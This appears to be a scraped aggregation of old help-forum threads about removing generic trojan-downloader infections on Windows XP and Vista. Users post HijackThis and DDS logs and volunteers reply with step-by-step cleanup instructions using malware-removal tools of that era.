Please disable Ewido Security Suite's Guard, as it may hinder the removal of some entries. You can re-enable it after you're clean.
Double-click the icon on Desktop to launch Ewido... Read more

1 more replies
Answer Match 69.72%

Hi all!

I have/had been infected with the Win 32 Generic Trojan Downloader V8 as discovered initially by AVG. I cleaned this but have been warned later for other infected files (several names) every time I reboot. Windows Defender has identified these infected files, as well as AVG, and cleaned them. I am also seeing that web browsing is slow and several web pages are blocked in IE and Firefox (antivirus and security related pages). The good news is Bleeping Computer is not blocked.

I have since installed Spy Bot S&D, HJT and MAM, but they don't seem to detect anything. AVG finds infections on reboot occasionally. I'm also having trouble updating my anti virus, MAM and Windows Defender.

Please help. How do I restore full web navigation and kill the trojan downloader?
DDS (Ver_09-06-26.01) - NTFSx86
Run by GLADYS LOMBANA at 12:43:16.30 on Thu 07/16/2009
Internet Explorer: 8.0.6001.18783
Microsoft® Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.3070.1394 [GMT -5:00]

SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k... Read more

A:Infected with Win 32 Generic Trojan Downloader V8

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.
Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.
If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.

Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Answer Match 69.72%

Hi
I'm fixing a friend's pc which has been infected with two trojan horses Downloader.Generic 7 and also 11.
I have installed and run CCleaner, Malwarebytes Anti-Malware, SuperAntiSpyware, updated Java Runtime (and deleted old version) and now I have the following log from HJT.
Could someone please check this log to make sure I now have a clean system?
Thanks
Cheers
Teresa

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:45:37 PM, on 9/28/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Acer\Acer eConsole\MediaServerService.exe
C:\Acer\Empowering Technology\ePerformance\MemCheck.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\system32\SysMonitor.exe
C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
C:\Program Files\Acer\Acer eMode Management\AspireService.exe
C:\Prog... Read more

A:Trojan Horse Downloader.generic 7 And 11

Hello Teresa.J,

Welcome to Bleeping Computer

Could I please see the report you got from MBAM? It would help me determine what we need to do from here.

Thanks,
tea

31 more replies
Answer Match 69.72%

My McAfee recently said that it found a trojan in my IE temp files that had infected Bgates[1].exe that keeps showing up as infected with the QLowZones-15. After that notice I get one that says a file in the Windows temp file has been infected with a downloader trojan or something. I didn't note what the exact name was.



Logfile of HijackThis v1.99.1
Scan saved at 4:23:51 PM, on 7/13/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
c:\Program Files\Norton Personal Firewall\NISUM.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\Program Files\Softex\OmniPass\Omniserv.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Softex\OmniPass\OPXPApp.exe
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\WLService.exe
c:\Program Files\Norton Personal Firewall\ccPxySvc.exe
C:\Program Files\Linksys Wireless-G USB Wireless Network Monitor\WUSB54Gv2.exe
C:\WINDOWS\Explorer.EXE
C:\windows\system\hpsysdrv.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
C:\Program F... Read more

A:QLowZones-15 Trojan and Generic DOwnloader

Hi Lithium and welcome to TSF.

There's not a great deal showing in your log, but let's do some cleaning and see what turns up.


You may wish to Subscribe to this thread (Thread Tools) so that you are notified when you receive a reply.


Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers when you are following the procedures below.



Show Hidden Files
Go to My Computer > Tools > Folder Options > View tab and make sure that Show hidden files and folders is enabled. Also make sure that the System files and Folders are showing / visible. Uncheck the Hide protected operating system files option.




Downloads
Please download Cleanup! or use this Alternate Link if the main link does not work and install it. You will use this later.
*NOTE* Cleanup deletes EVERYTHING out of temporary folders and does NOT make backups. If you have any files in any TEMP directory and you need to keep them, then please MOVE THEM NOW!


Download Ewido Anti-Malware
This is a 30 day trial
Install Ewido Anti-Malware.
Double-click the icon on Desktop to launch Ewido
On the top of the main screen click Shield
Click the word active to change it to inactive
On the top of the main screen click Update.
Then click on Start Update. The update will start and a progress bar will show the updates being installed.
Once the update has completed select the &qu... Read more

4 more replies
Answer Match 69.72%

Trojan: Generic Downloader.c​
Hi

Now I went to get help at McAfee and I told them from the beginning my problem, the name of the Trojan and the file name. So they made me do something that took me 2 days to do, and when I told them it didn't work, the person asked me the name of the file. I told them once again and the person sent me here.

So I downloaded HijackThis, like the person told me to. I scanned it. I found it and I deleted it. Then deleted the backup one. But it's still on my computer. So I tried deleting it while it was restarting and still nothing. Please help! I'm going crazy! It's gonna be a week my computer's been like this.

The File Name: st3.dll
Trojan Name: Generic Downloader.c
 

A:Trojan: Generic Downloader.c Please Help! I'm going crazy!

16 more replies
Answer Match 69.72%

I'm working on XP and yesterday I got a warning from my virus scan that it detected a trojan. It's a .dat file in my system32 folder, and it also mentions a generic downloader.z in the virus scan window.

I've been searching around on how to delete the file, but as usual it can't be because it's already in use. I've looked into the generic downloader.z thing but haven't really gotten much understanding about it.

Anyways, ever since I got the alert, my computer is slowed right down. If I have the trojan alert window open, then open another program or window (ex. Task Manager), the trojan seems to switch its application to whatever I just opened, then completely slowing it down to the point where it takes 5 minutes just to open the Task Manager. It just completely overloads my computer to run at full capacity, to the point where it's too much.

If I start up my computer and immediately hit ctrl alt delete I can get it open without any problem, but from there I can't end any processes that I've read could be giving me issues. If I open any internet browsers, it shows up in the processes list, the trojan switches to the browser that I opened, but no window actually opens.

I have no idea what I can do. Pretty much everything is locked down and getting on the internet to download any virus removal programs isn't an option.

Any ideas of what's going on?

Thanks for the help.

Edit: the .dat file in my system32 folder is named _c001FE60.dat if that's of any help.
 

More replies
Answer Match 69.72%

I was looking on one of your other forums and I had the same problem as one of your members, zinc63. I was reading through the forum and was trying to work out the virus by myself and it turns out that I am not very good at that. Anyway I now have the HijackThis, smitrem.exe, ewido anti-malware, and killbox.exe. I ran the HijackThis and I hope that you can help me from here. The AVG pops up all the time with the virus and I press heal and it doesn't, and no scans I have done in safe mode with any antivirus have caught the problem, and I don't have system restore on.
Thanks for the help

brian

Logfile of HijackThis v1.99.1
Scan saved at 10:19:02 PM, on 5/2/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\SPYWAREfighter\spfprc.exe
C:\Program Files\AIM\aim.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Valve\Steam\Steam.exe
C:\WINDOWS\System32\dcomcfg.exe
C:\Program... Read more

A:Trojan Horse Downloader.Generic.NON

16 more replies
Answer Match 69.72%

Please, I need help! I'm trying to get rid of this virus that appears every time I start my computer. AVG recognizes it but seems not to be able to erase it from the disk.
Thank you very much

Logfile of HijackThis v1.99.1
Scan saved at 13:52:25, on 02/05/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PccGuide.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Dell\Me... Read more

A:Cant Get Rid Of Trojan Horse Downloader Generic.tuc

Hi and welcome to Bleeping Computer! My name is Sam and I will be helping you.

Please download Ewido Security Suite; it is a trial version of the program.
Install ewido security suite
When installing, under "Additional Options" uncheck "Install background guard" and "Install scan via context menu".
Launch ewido, there should be an icon on your desktop, double-click it.
The program will now go to the main screen
You will need to update ewido to the latest definition files.
On the left hand side of the main screen click update
Then click on Start Update
The update will start and a progress bar will show the updates being installed.
If you are having problems with the updater, you can use this link to manually update ewido.
http://www.ewido.net/en/download/updates/

Once the updates are installed do the following:
Click on scanner
Click on Complete System Scan and the scan will begin.
While the scan is in progress you will be prompted to clean files, click OK
When it asks if you want to clean the first file, put a check in the lower left corner of the box that says "Perform action on all infections" then choose clean and click OK.
Once the scan has completed, there will be a button located on the bottom of the screen named Save report
Click Save report.
Save the report .txt file to your desktop.
Now close ewido security suite.
Reboot your computer and post a new hijackthis log and the log from Ewido.

2 more replies
Answer Match 69.72%

I tried to follow the prep guide but could not get DDS to run so tried RSIT.exe which finally gave:- Hope I have uploaded the .txt file OK

Logfile of random's system information tool 1.08 (written by random/random)
Run by David at 2010-09-17 18:34:02
Microsoft Windows XP Home Edition Service Pack 3
System drive C: has 7 GB (9%) free of 73 GB
Total RAM: 510 MB (21% free)

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 18:36:38, on 17/09/10
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Intel\Modem Event Monitor\IntelMEM.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatchTray9.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\ALWILS~... Read more

A:Trojan Horse downloader generic 10.QLN

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.

Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please Do not Attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.

In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

In order for me to see the status of the infection I will need a new set of logs to start with.
Please print out or make a copy in Notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.

DeFogger: Please download DeFogger to your desktop.
Double click DeFogger to run the tool.
The ap... Read more

3 more replies
Answer Match 69.72%

Hi, I need help getting rid of these viruses please. McAfee detected it. I am including a hijackthis log. Thank You

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 5:12:42 PM, on 2009-01-08
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Intel\Wireless\Bin\1XConfig.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
C:\WINDOWS\system32\DVDRAMSV.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\WINDOWS\system32\lxcycoms.exe
C:\Program Files\McAfee\Common Framework\FrameworkService.exe
C:\Program Files\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
c:\TOSHIBA\IVP\swupdate\swupdtmr.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\ehome\ehtray.e... Read more

A:Trojan virus generic.dx and downloader-uah

some one help please
 

1 more replies
Answer Match 69.72%

Hello. PLS CAN SOMEONE REPLY QUICK

I've been told to come for assistance here by some expert from McAfee. I do believe I have quite a common trojan located in windows\system32/st3.dll which is infected by generic downloader, although it cannot be cleaned or deleted.

As soon as I log on to my PC, within a minute I receive a pop-up from McAfee virus scan stating a trojan has been detected. All I want to do is get it removed, and find out whether the problems I've been having with my PC recently are linked to this trojan or not.

As instructed, I disabled System Restore and did a scan in safe mode with command prompt by typing
c:\SDAT>scan/adl/clan/report report txt/secure/program/streams/mime/mailbox/allole/rpterr/rptcor

after about an hour of scanning these were the results
Summary report on D:\*.*
File(s)
Total files: ........... 52442
Clean: ................. 52389
Possibly Infected: ..... 0
Cleaned: ............... 0
Non-critical Error(s): 1
Master Boot Record(s): ......... 1
Possibly Infected: ..... 0
Boot Sector(s): ................ 1
Possibly Infected: ..... 0

For some reason the trojan has not been picked up, and as soon as I reboot on normal screen, the pop-up detecting the trojan comes again.

Please can you find a way to get rid of it.
P.S. I have located the file st3.dll from my PC. Would it be quicker and safer to just delete this file from my PC, hence the trojan will be deleted???

MS WINDOWS XP
HOME EDITION
VERSION 2002
SERVICE: PACK2
COMPAQ PESARIO... Read more

A:ST3.DLL generic downloader trojan.HEEELLLLP

16 more replies
Answer Match 69.72%

Thanks to anyone who takes a look at this. My virus program keeps prompting me, telling me that it cannot remove this generic loader trojan. It seems to be located in windows/system32dll, but I have no idea how to tell with these logs. Any help will be greatly appreciated. My OS is Windows XP Pro, and my AV is McAfee

Here is My hijack LOG:

Logfile of HijackThis v1.99.1
Scan saved at 2:14:43 PM, on 11/22/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16544)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Intel\Wireless\Bin\ZcfgSvc.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\Program Files\Dell\Media Experience\PCMService.exe
C:\Program Files\McAfee\MSK\MskAgent.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\Intel\Wireless\Bin\ifrmewrk.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb12.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\WINDOWS... Read more

A:Please Help I have a generic downloader trojan problem

Download SDFix and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)

Please then reboot your computer in Safe Mode by doing the following :
Restart your computer
After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
Instead of Windows loading as normal, the Advanced Options Menu should appear;
Select the first option, to run Windows in Safe Mode, then press Enter.
Choose your usual account.

Open the extracted SDFix folder and double click RunThis.bat to start the script.
Type Y to begin the cleanup process.
It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
Press any Key and it will restart the PC.
When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
(Report.txt will also be copied to Clipboard ready for posting back on the forum).
Finally paste the contents of the Report.txt back on the forum with a new HijackThis log

then when it has rebooted

Download Combofix to your desktop:

* Double-click combofix.exe & follow the prompts.
* When finished, it shall produce a log for you. Post that log in your... Read more

1 more replies
Answer Match 69.72%

I was prompted by my McAfee protection service that I have been infected with a Trojan type "Generic Downloader .z" It would not allow me to erase it or anything and now none of my spyware/virus scans are picking this up. Is this a problem? Here is my latest Hijackthis log report. Any help would be greatly appreciated.

Logfile of HijackThis v1.99.1
Scan saved at 7:31:53 PM, on 6/20/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
c:\program files\mcafee.com\agent\mcdetect.exe
C:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\McAfee.com\VSO\oasclnt.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\McAfee.com\VSO\mcvsshld.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MpfService.exe
C:\PROGRA~1\McAfee.com\PERSON~1\MpfTray.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATI9AA.EXE
C:\PROGRA~1\mcafee.com\mps\mscif... Read more

A:Trojan generic Downloader removal HELP!

Hello and welcome to TSF

I recommend you Subscribe to this thread so you are notified of any replies via email. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

There isn't much showing in your log, so we'll try a general cleaning and see what turns up.

Please print out or copy this page to Notepad in order to assist you when carrying out the following instructions.

I see you have two or more Antivirus programs installed. In this case there can be too much of a good thing. Multiple AV's bog down your system and may even cause crashes. I highly recommend you remove all but one Antivirus program using Windows Add/Remove Programs.

Downloads(make sure to save these in a permanent location)
Cleanup!- Install it. You will use this later.

*NOTE* Cleanup deletes EVERYTHING out of temporary folders and does not make backups.

Ewido Anti-Malware
Install Ewido Anti-Malware
Double-click the icon on Desktop to launch Ewido
You will need to update Ewido to the latest definition files.
On the top of the main screen click Shield
Click the word active to change it to inactive
On the top of the main screen click Update.
Then click on Start Update. The update will start and a progress bar will show the updates being installed.
I also recommend changing the "Update interval" to something more reasonable like 12 hours.
If you are having problems with the updater, you can use this li... Read more

4 more replies
Answer Match 69.72%

Hi
My son's computer is infected with the Trojan Downloader generic4. dem virus and infostealer. I need help. I have downloaded AVG and it cannot remove the virus. PLEASE HELP...

Here is the hijackthis log:

Logfile of HijackThis v1.99.1
Scan saved at 6:07:23 PM, on 4/18/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Spyware Terminator\SpywareTerminatorShield.exe
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common F... Read more

A:Help...Trojan Downloader generic virus

13 more replies
Answer Match 69.72%

I have a similar problem with the above trojan as another poster on this forum. I followed the advice given to that poster and ran ATF Cleaner and Activescan. I still show three spyware programs. Here is my most recent logfile. Appreciate any help you can give me!!

Logfile of HijackThis v1.99.1
Scan saved at 7:58:36 PM, on 9/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Apex\ApexAgnt.exe
C:\Program Files\Network ICE\BlackICE\blackd.exe
C:\WINDOWS\system32\INTELMAA\ccmhlp32.exe
C:\Program Files\Wave Systems Corp\Common\DataServer.exe
C:\WINDOWS\system32\INTELMAA\ccmhelpr.exe
C:\Program Files\Executive Software\Diskeeper\DkService.exe
C:\Program Files\Intel\Intel NetStructure VPN Client\icsrv.exe
C:\PROGRA~1\Intel\INSTAN~1\issuser.exe
C:\Program Files\Network Associates\Common Framework\FrameworkService.exe
C:\Program Files\Network Associates\VirusScan\mcshield.exe
C:\Program Files\Network Associates\VirusScan\vstskmgr.exe
C:\Program Files\Intel\Intel Learning Network\Mobile Player\Bin\MBLPService.exe
C:\Program Files\Dell\QuickSet\NICCONFIGSVC.exe
C:\Program Files\Intel\Inte... Read more

A:Another computer with Generic Downloader.g Trojan

Do you have the Activescan results?
 

3 more replies
Answer Match 69.72%

Two of these picked up following AVG scan ... but AVG says infected objects located inside the archive and cannot be healed

Kindly advise - thanks - Oldie
 

A:Trojan Horse Downloader Generic 1

9 more replies
Answer Match 69.3%

I am infected with Trojan-Downloader.murlo and Trojan.Generic. I use PC Tools Spyware Dr. with Antivirus and I have run ComboFix and Malwarebytes. I have tried deleting all but the latest restore point and running all antivirus and anti-malware programs in safe mode. Eventually my scans were clean, but the trojans keep coming back. How do I eliminate them for good?

A:Trojan-Downloader.murlo & Trojan.Generic

If you are dealing with a malware infection, please be aware that using ComboFix is only one part of the disinfection process. Preliminary scans from other tools like DDS, RSIT and GMER should be used first because they provide comprehensive logs with specific details about files, folders and registry keys which may have been modified by malware infection. Analysis of those logs allows planning a strategy for effective disinfection and a determination if using ComboFix is necessary. As such, ComboFix should not be used without being advised to do so by a trained expert (see here) who is assisting them deal with a malware problem. Since you already ran Combofix, its log should be thoroughly reviewed by experts who have been trained to decipher them before proceeding. ComboFix should have saved that log to the root directory, usually C:\ComboFix.txt. Please follow the instructions in the "Preparation Guide For Requesting Help" starting at Step 6. When you have done that, post the required logs to include your ComboFix log in that forum, NOT here, for assistance by the Malware Response Team Experts. If HelpBot replies to your topic, please follow Step One and CLICK the link so it will report your topic to the team members.

1 more replies
Answer Match 68.88%

I'm trying to fix my friend's computer and remove this virus reported by AVG, but it keeps returning. Here is the HiJack Log. Thanks for your help.
Logfile of HijackThis v1.99.1
Scan saved at 10:39:54 PM, on 2/5/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb09.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Verizon Online\SupportCenter\bin\mpbtn.exe
C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINDOWS\services.exe
C:\WINDOWS\services.exe
C:\WINDOWS\system32\ntvdm.exe
